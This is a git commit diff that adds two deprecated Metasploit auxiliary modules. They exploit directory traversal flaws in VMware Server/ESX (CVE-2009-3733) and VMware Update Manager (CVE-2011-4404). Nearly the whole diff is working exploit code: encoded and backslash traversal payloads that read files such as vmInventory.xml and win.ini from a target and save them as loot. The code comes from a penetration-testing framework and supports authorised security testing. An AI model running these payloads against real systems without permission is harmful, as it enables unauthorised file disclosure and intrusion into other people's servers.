Add depcrecated note to the existing modules
parent
3279518bbd
commit
49e4820c57
|
@ -0,0 +1,87 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
# Exploit mixins should be called first
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
# Scanner mixin should be near last
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Module::Deprecated
|
||||
|
||||
deprecated(Date.new(2015,7,21), 'auxiliary/scanner/vmware/vmware_server_dir_trav')
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'VMware Server Directory Traversal Vulnerability',
|
||||
'Description' => 'This modules exploits the VMware Server Directory Traversal
|
||||
vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before
|
||||
2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5
|
||||
allows remote attackers to read arbitrary files. Common VMware server ports
|
||||
80/8222 and 443/8333 SSL. If you want to download the entire VM, check out
|
||||
the gueststealer tool.',
|
||||
'Author' => 'CG' ,
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2009-0015.html' ],
|
||||
[ 'OSVDB', '59440' ],
|
||||
[ 'BID', '36842' ],
|
||||
[ 'CVE', '2009-3733' ],
|
||||
[ 'URL', 'http://fyrmassociates.com/tools/gueststealer-v1.1.pl' ]
|
||||
]
|
||||
)
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8222),
|
||||
OptString.new('FILE', [ true, "The file to view", '/etc/vmware/hostd/vmInventory.xml']),
|
||||
OptString.new('TRAV', [ true, "Traversal Depth", '/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(target_host)
|
||||
|
||||
begin
|
||||
file = datastore['FILE']
|
||||
trav = datastore['TRAV']
|
||||
res = send_request_raw({
|
||||
'uri' => trav+file,
|
||||
'version' => '1.1',
|
||||
'method' => 'GET'
|
||||
}, 25)
|
||||
|
||||
if res.nil?
|
||||
print_error("Connection timed out")
|
||||
return
|
||||
end
|
||||
|
||||
if res.code == 200
|
||||
#print_status("Output Of Requested File:\n#{res.body}")
|
||||
print_status("#{target_host}:#{rport} appears vulnerable to VMWare Directory Traversal Vulnerability")
|
||||
report_vuln(
|
||||
{
|
||||
:host => target_host,
|
||||
:port => rport,
|
||||
:proto => 'tcp',
|
||||
:name => self.name,
|
||||
:info => "Module #{self.fullname} reports directory traversal of #{target_host}:#{rport} with response code #{res.code}",
|
||||
:refs => self.references,
|
||||
:exploited_at => Time.now.utc
|
||||
}
|
||||
)
|
||||
else
|
||||
vprint_status("Received #{res.code} for #{trav}#{file}")
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
|
||||
print_error(e.message)
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,75 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Module::Deprecated
|
||||
|
||||
deprecated(Date.new(2015,7,21), 'auxiliary/scanner/vmware/vmware_update_manager_traversal')
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "VMWare Update Manager 4 Directory Traversal",
|
||||
'Description' => %q{
|
||||
This modules exploits a directory traversal vulnerability in VMWare Update Manager
|
||||
on port 9084. Versions affected by this vulnerability: vCenter Update Manager
|
||||
4.1 prior to Update 2, vCenter Update Manager 4 Update 4.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Alexey Sintsov', #Initial discovery, poc
|
||||
'sinn3r' #Metasploit
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2011-4404'],
|
||||
['EDB', '18138'],
|
||||
['URL', 'http://www.vmware.com/security/advisories/VMSA-2011-0014.html'],
|
||||
['URL', 'http://dsecrg.com/pages/vul/show.php?id=342']
|
||||
],
|
||||
'DisclosureDate' => "Nov 21 2011"))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(9084),
|
||||
OptString.new('URIPATH', [true, 'URI path to the downloads', '/vci/downloads/']),
|
||||
OptString.new('FILE', [true, 'Define the remote file to download', 'windows\\win.ini'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
fname = File.basename(datastore['FILE'])
|
||||
traversal = ".\\..\\..\\..\\..\\..\\..\\..\\"
|
||||
uri = normalize_uri(datastore['URIPATH']) + traversal + datastore['FILE']
|
||||
|
||||
print_status("#{rhost}:#{rport} - Requesting: #{uri}")
|
||||
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => uri
|
||||
}, 25)
|
||||
|
||||
# If there's no response, don't bother
|
||||
if res.nil? or res.body.empty?
|
||||
print_error("No content retrieved from: #{ip}")
|
||||
return
|
||||
end
|
||||
|
||||
if res.code == 404
|
||||
print_error("#{rhost}:#{rport} - File not found")
|
||||
return
|
||||
else
|
||||
print_good("File retrieved from: #{ip}")
|
||||
p = store_loot("vmware.traversal.file", "application/octet-stream", rhost, res.to_s, fname)
|
||||
print_status("File stored in: #{p}")
|
||||
end
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue